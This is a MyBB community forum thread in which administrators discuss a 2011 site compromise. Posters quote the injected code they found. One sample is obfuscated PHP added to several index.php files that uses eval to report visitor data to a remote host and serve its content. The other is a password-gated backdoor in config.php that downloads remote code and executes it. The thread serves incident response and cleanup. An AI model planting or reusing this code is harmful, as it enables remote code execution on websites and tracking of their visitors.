MyBB Community Forums

so a few users have been complaining that norton was throwing alerts when they would login to the forum. one guy actually remembered to save the alert and post it up so I could see what it said and here's what we have:

"Web Attack: Mass Iframe Injection Attack 2; An intrusion attempt by myforumurl.com was blocked; Mon.,Oct 17, 8:42 AM; (IP address removed)."

anyhow, while running the file verification tool, I noticed that all of the index.php files within mybb had the following php code added to the very bottom of the file:

<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>

that code was added to the following files:

/index.php
/admin/index.php
/admin/modules/home/index.php
/archive/index.php

hmm., re-upload fresh files from latest myBB download package ( see also 1.6.4 Security Vulnerability )

(2011-10-17, 08:39 PM)ranjani Wrote: [ -> ]hmm., re-upload fresh files from latest myBB download package ( see also 1.6.4 Security Vulnerability )

yep, I just did that for every forum I run.

^ someone also suggested to check config.php for any malicious code - of course, it is generally not writeable ; yet,..

(2011-10-17, 08:50 PM)ranjani Wrote: [ -> ]^ someone also suggested to check config.php for any malicious code - of course, it is generally not writeable ; yet,..

its writable by default and some folks have had it compromised as well.

^ though off topic, I do not understand the reason for using CHMOD 666 for config.php
some use 444 !! AND make it writeable only when it is necessary & put back CHMOD 444 !!

out of the 3 mybb installations on my server, I did notice this code in 1 of the 3 config.php files

if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '4be5a36cbaca8ab9d2066debfe4e65c1'){
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}

also wanted to note that my showthread.php was infected...

every file on your site can be infected by this issue, as can new files be created, database access, etc can all be compromised. its an "open" exploit that lets most any code be executed

You have the EXACT same problem as me! I traced the injection to DrHouseNews.Orge.pl! See below two threads:

http://community.mybb.com/thread-106302.html
http://community.mybb.com/thread-106212-page-2.html